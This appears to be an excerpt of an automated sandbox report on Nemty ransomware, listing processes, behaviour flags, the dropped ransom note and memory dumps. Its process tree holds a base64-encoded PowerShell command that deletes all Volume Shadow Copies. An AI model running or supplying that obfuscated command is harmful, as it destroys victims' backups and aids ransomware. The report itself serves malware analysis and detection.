C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 6684⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Enumerates system info in registry
- Checks processor information in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\NEMTY_MLK8D17-DECRYPT.txt"3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\NEMTY_MLK8D17-DECRYPT.txt4⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
-
\??\c:\windows\system32\taskhostw.exetaskhostw.exe -RegisterDevice -SettingChange -Full1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\89TS8EPW\jap.exe
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\89TS8EPW\jap.exe.64engns.partial
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\O3NMJQL8\jap[1].exe
- C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\PLFRAX05.cookie
- C:\Users\Admin\NEMTY_MLK8D17-DECRYPT.txt
- memory/3752-22-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-26-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-11-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-12-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-13-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-14-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-15-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-16-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-17-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-18-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-19-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-20-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-21-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-10-0x00000000055F0000-0x00000000055F1000-memory.dmp (Filesize 4KB)
- memory/3752-23-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-24-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-25-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-9-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-27-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-28-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-29-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-30-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-31-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-32-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-33-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-34-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-35-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-36-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-37-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-38-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-39-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-40-0x00000000031F0000-0x00000000031F1000-memory.dmp (Filesize 4KB)
- memory/3752-4-0x0000000005500000-0x0000000005501000-memory.dmp (Filesize 4KB)
- memory/3752-3-0x0000000004C30000-0x0000000004C31000-memory.dmp (Filesize 4KB)